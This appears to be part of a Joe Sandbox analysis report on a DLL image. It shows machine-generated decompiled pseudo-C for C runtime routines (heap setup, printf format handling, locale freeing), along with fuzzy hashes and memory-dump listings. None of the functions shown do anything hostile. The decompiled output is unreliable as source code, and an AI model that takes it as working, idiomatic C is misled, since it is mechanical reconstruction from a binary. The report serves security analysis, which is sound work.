                                                                                        • Snapshot File: hcaresult_0_3_10000000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionRaise
                                                                                        • String ID:
                                                                                        • API String ID: 3997070919-0
                                                                                        • Opcode ID: 410e0530dfaa3c64c0b020d2f72026a329b9549d01a87e831539186baa7d7703
                                                                                        • Instruction ID: b853561da2a16770f805eca76401619c177a0be9c9e0e15578d2f5aa8c945910
                                                                                        • Opcode Fuzzy Hash: 410e0530dfaa3c64c0b020d2f72026a329b9549d01a87e831539186baa7d7703
                                                                                        • Instruction Fuzzy Hash: 6EB14A35610609DFD759CF28C486B997BE0FF453A4F25865CE89ACF2A1C335E992CB40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E1000BDEA() {
                                                                                        				signed int _t3;
                                                                                        
                                                                                        				_t3 = GetProcessHeap();
                                                                                        				 *0x1001b214 = _t3;
                                                                                        				return _t3 & 0xffffff00 | _t3 != 0x00000000;
                                                                                        			}




                                                                                        0x1000bdea
                                                                                        0x1000bdf2
                                                                                        0x1000bdfa

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.661084660.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000000.00000003.373928207.000000001001D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661074193.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661103501.0000000010013000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661115201.000000001001A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661124775.000000001001C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_10000000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapProcess
                                                                                        • String ID:
                                                                                        • API String ID: 54951025-0
                                                                                        • Opcode ID: 1bbc9cfa8b0485db0feb3b31825291126b3f73dd308d97184a48a9c23a8bc84f
                                                                                        • Instruction ID: 03c64f937f298867f7776d1dc7b3907b988981a23edd0c5f240f9ef5578f8106
                                                                                        • Opcode Fuzzy Hash: 1bbc9cfa8b0485db0feb3b31825291126b3f73dd308d97184a48a9c23a8bc84f
                                                                                        • Instruction Fuzzy Hash: F5A011302022228BE3008F388A8820C3BE8AA08A80B08C028E00AC0020EB30C288AA02
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 83%
                                                                                        			E10006FE0(void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                                                                        				signed int _v8;
                                                                                        				signed int _v12;
                                                                                        				signed int _v16;
                                                                                        				signed int _t52;
                                                                                        				signed int _t54;
                                                                                        				signed int _t55;
                                                                                        				void* _t56;
                                                                                        				signed char _t60;
                                                                                        				signed char _t62;
                                                                                        				signed int _t64;
                                                                                        				void* _t65;
                                                                                        				signed int _t66;
                                                                                        				signed char _t75;
                                                                                        				signed char _t78;
                                                                                        				void* _t86;
                                                                                        				void* _t88;
                                                                                        				signed char _t90;
                                                                                        				signed char _t92;
                                                                                        				signed int _t93;
                                                                                        				signed int _t96;
                                                                                        				signed int _t98;
                                                                                        				signed int _t99;
                                                                                        				signed int _t103;
                                                                                        				signed int* _t104;
                                                                                        				void* _t106;
                                                                                        				signed int _t112;
                                                                                        				unsigned int _t114;
                                                                                        				signed char _t116;
                                                                                        				void* _t124;
                                                                                        				unsigned int _t125;
                                                                                        				void* _t126;
                                                                                        				signed int _t127;
                                                                                        				short _t128;
                                                                                        				void* _t131;
                                                                                        				void* _t133;
                                                                                        				void* _t135;
                                                                                        				signed int _t136;
                                                                                        				void* _t137;
                                                                                        				void* _t139;
                                                                                        				void* _t140;
                                                                                        
                                                                                        				_t126 = __edi;
                                                                                        				_t52 =  *0x1001a004; // 0xcfb68a75
                                                                                        				_v8 = _t52 ^ _t136;
                                                                                        				_t135 = __ecx;
                                                                                        				_t103 = 0;
                                                                                        				_t124 = 0x41;
                                                                                        				_t54 =  *(__ecx + 0x32) & 0x0000ffff;
                                                                                        				_t106 = 0x58;
                                                                                        				_t139 = _t54 - 0x64;
                                                                                        				if(_t139 > 0) {
                                                                                        					__eflags = _t54 - 0x70;
                                                                                        					if(__eflags > 0) {
                                                                                        						_t55 = _t54 - 0x73;
                                                                                        						__eflags = _t55;
                                                                                        						if(_t55 == 0) {
                                                                                        							L9:
                                                                                        							_t56 = E10007727(_t135);
                                                                                        							L10:
                                                                                        							if(_t56 != 0) {
                                                                                        								__eflags =  *((intOrPtr*)(_t135 + 0x30)) - _t103;
                                                                                        								if( *((intOrPtr*)(_t135 + 0x30)) != _t103) {
                                                                                        									L71:
                                                                                        									L72:
                                                                                        									return E1000296F(_v8 ^ _t136);
                                                                                        								}
                                                                                        								_t125 =  *(_t135 + 0x20);
                                                                                        								_push(_t126);
                                                                                        								_v16 = _t103;
                                                                                        								_t60 = _t125 >> 4;
                                                                                        								_v12 = _t103;
                                                                                        								_t127 = 0x20;
                                                                                        								__eflags = 1 & _t60;
                                                                                        								if((1 & _t60) == 0) {
                                                                                        									L46:
                                                                                        									_t112 =  *(_t135 + 0x32) & 0x0000ffff;
                                                                                        									__eflags = _t112 - 0x78;
                                                                                        									if(_t112 == 0x78) {
                                                                                        										L48:
                                                                                        										_t62 = _t125 >> 5;
                                                                                        										__eflags = _t62 & 0x00000001;
                                                                                        										if((_t62 & 0x00000001) == 0) {
                                                                                        											L50:
                                                                                        											__eflags = 0;
                                                                                        											L51:
                                                                                        											__eflags = _t112 - 0x61;
                                                                                        											if(_t112 == 0x61) {
                                                                                        												L54:
                                                                                        												_t64 = 1;
                                                                                        												L55:
                                                                                        												_t128 = 0x30;
                                                                                        												__eflags = _t64;
                                                                                        												if(_t64 != 0) {
                                                                                        													L57:
                                                                                        													_t65 = 0x58;
                                                                                        													 *((short*)(_t136 + _t103 * 2 - 0xc)) = _t128;
                                                                                        													__eflags = _t112 - _t65;
                                                                                        													if(_t112 == _t65) {
                                                                                        														L60:
                                                                                        														_t66 = 1;
                                                                                        														L61:
                                                                                        														__eflags = _t66;
                                                                                        														asm("cbw");
                                                                                        														 *((short*)(_t136 + _t103 * 2 - 0xa)) = ((_t66 & 0xffffff00 | _t66 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
                                                                                        														_t103 = _t103 + 2;
                                                                                        														__eflags = _t103;
                                                                                        														L62:
                                                                                        														_t131 =  *((intOrPtr*)(_t135 + 0x24)) -  *((intOrPtr*)(_t135 + 0x38)) - _t103;
                                                                                        														__eflags = _t125 & 0x0000000c;
                                                                                        														if((_t125 & 0x0000000c) == 0) {
                                                                                        															E10006849(_t135 + 0x448, 0x20, _t131, _t135 + 0x18);
                                                                                        															_t137 = _t137 + 0x10;
                                                                                        														}
                                                                                        														E100078E8(_t135 + 0x448,  &_v16, _t103, _t135 + 0x18,  *((intOrPtr*)(_t135 + 0xc)));
                                                                                        														_t114 =  *(_t135 + 0x20);
                                                                                        														_t104 = _t135 + 0x18;
                                                                                        														_t75 = _t114 >> 3;
                                                                                        														__eflags = _t75 & 0x00000001;
                                                                                        														if((_t75 & 0x00000001) != 0) {
                                                                                        															_t116 = _t114 >> 2;
                                                                                        															__eflags = _t116 & 0x00000001;
                                                                                        															if((_t116 & 0x00000001) == 0) {
                                                                                        																E10006849(_t135 + 0x448, 0x30, _t131, _t104);
                                                                                        																_t137 = _t137 + 0x10;
                                                                                        															}
                                                                                        														}
                                                                                        														E1000785D(_t135, 0);
                                                                                        														__eflags =  *_t104;
                                                                                        														if( *_t104 >= 0) {
                                                                                        															_t78 =  *(_t135 + 0x20) >> 2;
                                                                                        															__eflags = _t78 & 0x00000001;
                                                                                        															if((_t78 & 0x00000001) != 0) {
                                                                                        																E10006849(_t135 + 0x448, 0x20, _t131, _t104);
                                                                                        															}
                                                                                        														}
                                                                                        														goto L71;
                                                                                        													}
                                                                                        													_t86 = 0x41;
                                                                                        													__eflags = _t112 - _t86;
                                                                                        													if(_t112 == _t86) {
                                                                                        														goto L60;
                                                                                        													}
                                                                                        													_t66 = 0;
                                                                                        													goto L61;
                                                                                        												}
                                                                                        												__eflags = _t64;
                                                                                        												if(_t64 == 0) {
                                                                                        													goto L62;
                                                                                        												}
                                                                                        												goto L57;
                                                                                        											}
                                                                                        											_t133 = 0x41;
                                                                                        											__eflags = _t112 - _t133;
                                                                                        											if(_t112 == _t133) {
                                                                                        												goto L54;
                                                                                        											}
                                                                                        											_t64 = 0;
                                                                                        											goto L55;
                                                                                        										}
                                                                                        										goto L51;
                                                                                        									}
                                                                                        									_t88 = 0x58;
                                                                                        									__eflags = _t112 - _t88;
                                                                                        									if(_t112 != _t88) {
                                                                                        										goto L50;
                                                                                        									}
                                                                                        									goto L48;
                                                                                        								}
                                                                                        								_t90 = _t125 >> 6;
                                                                                        								__eflags = 1 & _t90;
                                                                                        								if((1 & _t90) == 0) {
                                                                                        									__eflags = 1 & _t125;
                                                                                        									if((1 & _t125) == 0) {
                                                                                        										_t92 = _t125 >> 1;
                                                                                        										__eflags = 1 & _t92;
                                                                                        										if((1 & _t92) == 0) {
                                                                                        											goto L46;
                                                                                        										}
                                                                                        										_v16 = _t127;
                                                                                        										L45:
                                                                                        										_t103 = 1;
                                                                                        										goto L46;
                                                                                        									}
                                                                                        									_push(0x2b);
                                                                                        									L40:
                                                                                        									_pop(_t93);
                                                                                        									_v16 = _t93;
                                                                                        									goto L45;
                                                                                        								}
                                                                                        								_push(0x2d);
                                                                                        								goto L40;
                                                                                        							}
                                                                                        							L11:
                                                                                        							goto L72;
                                                                                        						}
                                                                                        						_t96 = _t55;
                                                                                        						__eflags = _t96;
                                                                                        						if(__eflags == 0) {
                                                                                        							L28:
                                                                                        							_push(_t103);
                                                                                        							_push(0xa);
                                                                                        							L29:
                                                                                        							_t56 = E10007532(_t135, _t126, __eflags);
                                                                                        							goto L10;
                                                                                        						}
                                                                                        						__eflags = _t96 - 3;
                                                                                        						if(__eflags != 0) {
                                                                                        							goto L11;
                                                                                        						}
                                                                                        						_push(0);
                                                                                        						L13:
                                                                                        						_push(0x10);
                                                                                        						goto L29;
                                                                                        					}
                                                                                        					if(__eflags == 0) {
                                                                                        						_t56 = E1000770F(__ecx);
                                                                                        						goto L10;
                                                                                        					}
                                                                                        					__eflags = _t54 - 0x67;
                                                                                        					if(_t54 <= 0x67) {
                                                                                        						L30:
                                                                                        						_t56 = E10007328(_t103, _t135);
                                                                                        						goto L10;
                                                                                        					}
                                                                                        					__eflags = _t54 - 0x69;
                                                                                        					if(_t54 == 0x69) {
                                                                                        						L27:
                                                                                        						_t3 = _t135 + 0x20;
                                                                                        						 *_t3 =  *(_t135 + 0x20) | 0x00000010;
                                                                                        						__eflags =  *_t3;
                                                                                        						goto L28;
                                                                                        					}
                                                                                        					__eflags = _t54 - 0x6e;
                                                                                        					if(_t54 == 0x6e) {
                                                                                        						_t56 = E1000767C(__ecx, _t124);
                                                                                        						goto L10;
                                                                                        					}
                                                                                        					__eflags = _t54 - 0x6f;
                                                                                        					if(_t54 != 0x6f) {
                                                                                        						goto L11;
                                                                                        					}
                                                                                        					_t56 = E100076F0(__ecx);
                                                                                        					goto L10;
                                                                                        				}
                                                                                        				if(_t139 == 0) {
                                                                                        					goto L27;
                                                                                        				}
                                                                                        				_t140 = _t54 - _t106;
                                                                                        				if(_t140 > 0) {
                                                                                        					_t98 = _t54 - 0x5a;
                                                                                        					__eflags = _t98;
                                                                                        					if(_t98 == 0) {
                                                                                        						_t56 = E100072C5(__ecx);
                                                                                        						goto L10;
                                                                                        					}
                                                                                        					_t99 = _t98 - 7;
                                                                                        					__eflags = _t99;
                                                                                        					if(_t99 == 0) {
                                                                                        						goto L30;
                                                                                        					}
                                                                                        					__eflags = _t99;
                                                                                        					if(__eflags != 0) {
                                                                                        						goto L11;
                                                                                        					}
                                                                                        					L17:
                                                                                        					_t56 = E1000749A(_t135, __eflags, _t103);
                                                                                        					goto L10;
                                                                                        				}
                                                                                        				if(_t140 == 0) {
                                                                                        					_push(1);
                                                                                        					goto L13;
                                                                                        				}
                                                                                        				if(_t54 == _t124) {
                                                                                        					goto L30;
                                                                                        				}
                                                                                        				if(_t54 == 0x43) {
                                                                                        					goto L17;
                                                                                        				}
                                                                                        				if(_t54 <= 0x44) {
                                                                                        					goto L11;
                                                                                        				}
                                                                                        				if(_t54 <= 0x47) {
                                                                                        					goto L30;
                                                                                        				}
                                                                                        				if(_t54 != 0x53) {
                                                                                        					goto L11;
                                                                                        				}
                                                                                        				goto L9;
                                                                                        			}











































                                                                                        0x10006fe0
                                                                                        0x10006fe8
                                                                                        0x10006fef
                                                                                        0x10006ff4
                                                                                        0x10006ff6
                                                                                        0x10006ffa
                                                                                        0x10006ffd
                                                                                        0x10007001
                                                                                        0x10007002
                                                                                        0x10007005
                                                                                        0x10007072
                                                                                        0x10007075
                                                                                        0x100070c4
                                                                                        0x100070c4
                                                                                        0x100070c7
                                                                                        0x10007033
                                                                                        0x10007035
                                                                                        0x1000703a
                                                                                        0x1000703c
                                                                                        0x100070e2
                                                                                        0x100070e5
                                                                                        0x1000722b
                                                                                        0x1000722d
                                                                                        0x1000723c
                                                                                        0x1000723c
                                                                                        0x100070eb
                                                                                        0x100070f0
                                                                                        0x100070f3
                                                                                        0x100070f6
                                                                                        0x100070fa
                                                                                        0x10007100
                                                                                        0x10007101
                                                                                        0x10007103
                                                                                        0x1000712d
                                                                                        0x1000712d
                                                                                        0x10007131
                                                                                        0x10007134
                                                                                        0x1000713e
                                                                                        0x10007140
                                                                                        0x10007143
                                                                                        0x10007145
                                                                                        0x1000714b
                                                                                        0x1000714b
                                                                                        0x1000714d
                                                                                        0x1000714d
                                                                                        0x10007150
                                                                                        0x1000715e
                                                                                        0x1000715e
                                                                                        0x10007160
                                                                                        0x10007162
                                                                                        0x10007163
                                                                                        0x10007165
                                                                                        0x1000716b
                                                                                        0x1000716d
                                                                                        0x1000716e
                                                                                        0x10007173
                                                                                        0x10007176
                                                                                        0x10007184
                                                                                        0x10007184
                                                                                        0x10007186
                                                                                        0x10007186
                                                                                        0x10007191
                                                                                        0x10007193
                                                                                        0x10007198
                                                                                        0x10007198
                                                                                        0x1000719b
                                                                                        0x100071a1
                                                                                        0x100071a3
                                                                                        0x100071a6
                                                                                        0x100071b6
                                                                                        0x100071bb
                                                                                        0x100071bb
                                                                                        0x100071d0
                                                                                        0x100071d5
                                                                                        0x100071d8
                                                                                        0x100071dd
                                                                                        0x100071e0
                                                                                        0x100071e2
                                                                                        0x100071e4
                                                                                        0x100071e7
                                                                                        0x100071ea
                                                                                        0x100071f7
                                                                                        0x100071fc
                                                                                        0x100071fc
                                                                                        0x100071ea
                                                                                        0x10007203
                                                                                        0x10007208
                                                                                        0x1000720b
                                                                                        0x10007210
                                                                                        0x10007213
                                                                                        0x10007215
                                                                                        0x10007222
                                                                                        0x10007227
                                                                                        0x10007215
                                                                                        0x00000000
                                                                                        0x1000722a
                                                                                        0x1000717a
                                                                                        0x1000717b
                                                                                        0x1000717e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10007180
                                                                                        0x00000000
                                                                                        0x10007180
                                                                                        0x10007167
                                                                                        0x10007169
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10007169
                                                                                        0x10007154
                                                                                        0x10007155
                                                                                        0x10007158
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000715a
                                                                                        0x00000000
                                                                                        0x1000715a
                                                                                        0x00000000
                                                                                        0x10007147
                                                                                        0x10007138
                                                                                        0x10007139
                                                                                        0x1000713c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000713c
                                                                                        0x10007107
                                                                                        0x1000710a
                                                                                        0x1000710c
                                                                                        0x10007117
                                                                                        0x10007119
                                                                                        0x10007121
                                                                                        0x10007123
                                                                                        0x10007125
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10007127
                                                                                        0x1000712b
                                                                                        0x1000712b
                                                                                        0x00000000
                                                                                        0x1000712b
                                                                                        0x1000711b
                                                                                        0x10007110
                                                                                        0x10007110
                                                                                        0x10007111
                                                                                        0x00000000
                                                                                        0x10007111
                                                                                        0x1000710e
                                                                                        0x00000000
                                                                                        0x1000710e
                                                                                        0x10007042
                                                                                        0x00000000
                                                                                        0x10007042
                                                                                        0x100070ce
                                                                                        0x100070ce
                                                                                        0x100070d1
                                                                                        0x100070a3
                                                                                        0x100070a3
                                                                                        0x100070a4
                                                                                        0x100070a6
                                                                                        0x100070a8
                                                                                        0x00000000
                                                                                        0x100070a8
                                                                                        0x100070d3
                                                                                        0x100070d6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x100070dc
                                                                                        0x1000704b
                                                                                        0x1000704b
                                                                                        0x00000000
                                                                                        0x1000704b
                                                                                        0x10007077
                                                                                        0x100070ba
                                                                                        0x00000000
                                                                                        0x100070ba
                                                                                        0x10007079
                                                                                        0x1000707c
                                                                                        0x100070af
                                                                                        0x100070b1
                                                                                        0x00000000
                                                                                        0x100070b1
                                                                                        0x1000707e
                                                                                        0x10007081
                                                                                        0x1000709f
                                                                                        0x1000709f
                                                                                        0x1000709f
                                                                                        0x1000709f
                                                                                        0x00000000
                                                                                        0x1000709f
                                                                                        0x10007083
                                                                                        0x10007086
                                                                                        0x10007098
                                                                                        0x00000000
                                                                                        0x10007098
                                                                                        0x10007088
                                                                                        0x1000708b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000708f
                                                                                        0x00000000
                                                                                        0x1000708f
                                                                                        0x10007007
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000700d
                                                                                        0x1000700f
                                                                                        0x1000704f
                                                                                        0x1000704f
                                                                                        0x10007052
                                                                                        0x1000706b
                                                                                        0x00000000
                                                                                        0x1000706b
                                                                                        0x10007054
                                                                                        0x10007054
                                                                                        0x10007057
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000705a
                                                                                        0x1000705d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000705f
                                                                                        0x10007062
                                                                                        0x00000000
                                                                                        0x10007062
                                                                                        0x10007011
                                                                                        0x10007049
                                                                                        0x00000000
                                                                                        0x10007049
                                                                                        0x10007015
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000701e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10007023
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10007028
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10007031
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.661084660.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000000.00000003.373928207.000000001001D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661074193.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661103501.0000000010013000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661115201.000000001001A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661124775.000000001001C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_10000000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c1085c0dd4fd7d5be1fba4d9176db32db850a7de8c06348af1f9816e47212bc1
                                                                                        • Instruction ID: b8c7b020d2440190594614745320d2379f3e40c62659200b0deae2dae28a2bef
                                                                                        • Opcode Fuzzy Hash: c1085c0dd4fd7d5be1fba4d9176db32db850a7de8c06348af1f9816e47212bc1
                                                                                        • Instruction Fuzzy Hash: BA614BB1F00706E6FA64C9288891BEE63D9FB452C0F104619F98EDB1CED95DED438355
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E1000C46E(intOrPtr _a4) {
                                                                                        				intOrPtr _v8;
                                                                                        				intOrPtr _t25;
                                                                                        				intOrPtr* _t26;
                                                                                        				intOrPtr _t28;
                                                                                        				intOrPtr* _t29;
                                                                                        				intOrPtr* _t31;
                                                                                        				intOrPtr* _t45;
                                                                                        				intOrPtr* _t46;
                                                                                        				intOrPtr* _t47;
                                                                                        				intOrPtr* _t55;
                                                                                        				intOrPtr* _t70;
                                                                                        				intOrPtr _t74;
                                                                                        
                                                                                        				_t74 = _a4;
                                                                                        				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                                                                                        				if(_t25 != 0 && _t25 != 0x1001a700) {
                                                                                        					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                                                                                        					if(_t45 != 0 &&  *_t45 == 0) {
                                                                                        						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                                                                                        						if(_t46 != 0 &&  *_t46 == 0) {
                                                                                        							E10009811(_t46);
                                                                                        							E1000E63C( *((intOrPtr*)(_t74 + 0x88)));
                                                                                        						}
                                                                                        						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                                                                                        						if(_t47 != 0 &&  *_t47 == 0) {
                                                                                        							E10009811(_t47);
                                                                                        							E1000E73A( *((intOrPtr*)(_t74 + 0x88)));
                                                                                        						}
                                                                                        						E10009811( *((intOrPtr*)(_t74 + 0x7c)));
                                                                                        						E10009811( *((intOrPtr*)(_t74 + 0x88)));
                                                                                        					}
                                                                                        				}
                                                                                        				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                                                                                        				if(_t26 != 0 &&  *_t26 == 0) {
                                                                                        					E10009811( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                                                                                        					E10009811( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                                                                                        					E10009811( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                                                                                        					E10009811( *((intOrPtr*)(_t74 + 0x8c)));
                                                                                        				}
                                                                                        				E1000C5E1( *((intOrPtr*)(_t74 + 0x9c)));
                                                                                        				_t28 = 6;
                                                                                        				_t55 = _t74 + 0xa0;
                                                                                        				_v8 = _t28;
                                                                                        				_t70 = _t74 + 0x28;
                                                                                        				do {
                                                                                        					if( *((intOrPtr*)(_t70 - 8)) != 0x1001a1c8) {
                                                                                        						_t31 =  *_t70;
                                                                                        						if(_t31 != 0 &&  *_t31 == 0) {
                                                                                        							E10009811(_t31);
                                                                                        							E10009811( *_t55);
                                                                                        						}
                                                                                        						_t28 = _v8;
                                                                                        					}
                                                                                        					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                                                                                        						_t29 =  *((intOrPtr*)(_t70 - 4));
                                                                                        						if(_t29 != 0 &&  *_t29 == 0) {
                                                                                        							E10009811(_t29);
                                                                                        						}
                                                                                        						_t28 = _v8;
                                                                                        					}
                                                                                        					_t55 = _t55 + 4;
                                                                                        					_t70 = _t70 + 0x10;
                                                                                        					_t28 = _t28 - 1;
                                                                                        					_v8 = _t28;
                                                                                        				} while (_t28 != 0);
                                                                                        				return E10009811(_t74);
                                                                                        			}















                                                                                        0x1000c476
                                                                                        0x1000c47a
                                                                                        0x1000c482
                                                                                        0x1000c48b
                                                                                        0x1000c490
                                                                                        0x1000c497
                                                                                        0x1000c49f
                                                                                        0x1000c4a7
                                                                                        0x1000c4b2
                                                                                        0x1000c4b8
                                                                                        0x1000c4b9
                                                                                        0x1000c4c1
                                                                                        0x1000c4c9
                                                                                        0x1000c4d4
                                                                                        0x1000c4da
                                                                                        0x1000c4de
                                                                                        0x1000c4e9
                                                                                        0x1000c4ef
                                                                                        0x1000c490
                                                                                        0x1000c4f0
                                                                                        0x1000c4f8
                                                                                        0x1000c50b
                                                                                        0x1000c51e
                                                                                        0x1000c52c
                                                                                        0x1000c537
                                                                                        0x1000c53c
                                                                                        0x1000c545
                                                                                        0x1000c54d
                                                                                        0x1000c54e
                                                                                        0x1000c554
                                                                                        0x1000c557
                                                                                        0x1000c55a
                                                                                        0x1000c561
                                                                                        0x1000c563
                                                                                        0x1000c567
                                                                                        0x1000c56f
                                                                                        0x1000c576
                                                                                        0x1000c57c
                                                                                        0x1000c57d
                                                                                        0x1000c57d
                                                                                        0x1000c584
                                                                                        0x1000c586
                                                                                        0x1000c58b
                                                                                        0x1000c593
                                                                                        0x1000c598
                                                                                        0x1000c599
                                                                                        0x1000c599
                                                                                        0x1000c59c
                                                                                        0x1000c59f
                                                                                        0x1000c5a2
                                                                                        0x1000c5a5
                                                                                        0x1000c5a5
                                                                                        0x1000c5b7

                                                                                        APIs
                                                                                        • ___free_lconv_mon.LIBCMT ref: 1000C4B2
                                                                                          • Part of subcall function 1000E63C: _free.LIBCMT ref: 1000E659
                                                                                          • Part of subcall function 1000E63C: _free.LIBCMT ref: 1000E66B
                                                                                          • Part of subcall function 1000E63C: _free.LIBCMT ref: 1000E67D
                                                                                          • Part of subcall function 1000E63C: _free.LIBCMT ref: 1000E68F
                                                                                          • Part of subcall function 1000E63C: _free.LIBCMT ref: 1000E6A1
                                                                                          • Part of subcall function 1000E63C: _free.LIBCMT ref: 1000E6B3
                                                                                          • Part of subcall function 1000E63C: _free.LIBCMT ref: 1000E6C5
                                                                                          • Part of subcall function 1000E63C: _free.LIBCMT ref: 1000E6D7
                                                                                          • Part of subcall function 1000E63C: _free.LIBCMT ref: 1000E6E9
                                                                                          • Part of subcall function 1000E63C: _free.LIBCMT ref: 1000E6FB
                                                                                          • Part of subcall function 1000E63C: _free.LIBCMT ref: 1000E70D
                                                                                          • Part of subcall function 1000E63C: _free.LIBCMT ref: 1000E71F
                                                                                          • Part of subcall function 1000E63C: _free.LIBCMT ref: 1000E731
                                                                                        • _free.LIBCMT ref: 1000C4A7
                                                                                          • Part of subcall function 10009811: HeapFree.KERNEL32(00000000,00000000,?,1000E7D1,?,00000000,?,00000000,?,1000E7F8,?,00000007,?,?,1000C606,?), ref: 10009827
                                                                                          • Part of subcall function 10009811: GetLastError.KERNEL32(?,?,1000E7D1,?,00000000,?,00000000,?,1000E7F8,?,00000007,?,?,1000C606,?,?), ref: 10009839
                                                                                        • _free.LIBCMT ref: 1000C4C9
                                                                                        • _free.LIBCMT ref: 1000C4DE
                                                                                        • _free.LIBCMT ref: 1000C4E9
                                                                                        • _free.LIBCMT ref: 1000C50B
                                                                                        • _free.LIBCMT ref: 1000C51E
                                                                                        • _free.LIBCMT ref: 1000C52C
                                                                                        • _free.LIBCMT ref: 1000C537
                                                                                        • _free.LIBCMT ref: 1000C56F
                                                                                        • _free.LIBCMT ref: 1000C576
                                                                                        • _free.LIBCMT ref: 1000C593
                                                                                        • _free.LIBCMT ref: 1000C5AB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.661084660.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000000.00000003.373928207.000000001001D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661074193.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661103501.0000000010013000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661115201.000000001001A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661124775.000000001001C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_10000000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                        • String ID:
                                                                                        • API String ID: 161543041-0
                                                                                        • Opcode ID: 0edceb9346d854996991c62064fda567d7d59e3b9eccc2fe9c2ef1910b358ac7
                                                                                        • Instruction ID: 678bb5be2e93cb19817caef69ddd86ffe873ef7f4ed4b9fecd2f40c4ee1b09fd
                                                                                        • Opcode Fuzzy Hash: 0edceb9346d854996991c62064fda567d7d59e3b9eccc2fe9c2ef1910b358ac7
                                                                                        • Instruction Fuzzy Hash: 6B314675A047499BFB21DB38DC85F5AB3E8FB012D0F118429E5499729ADE35FD818B20
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
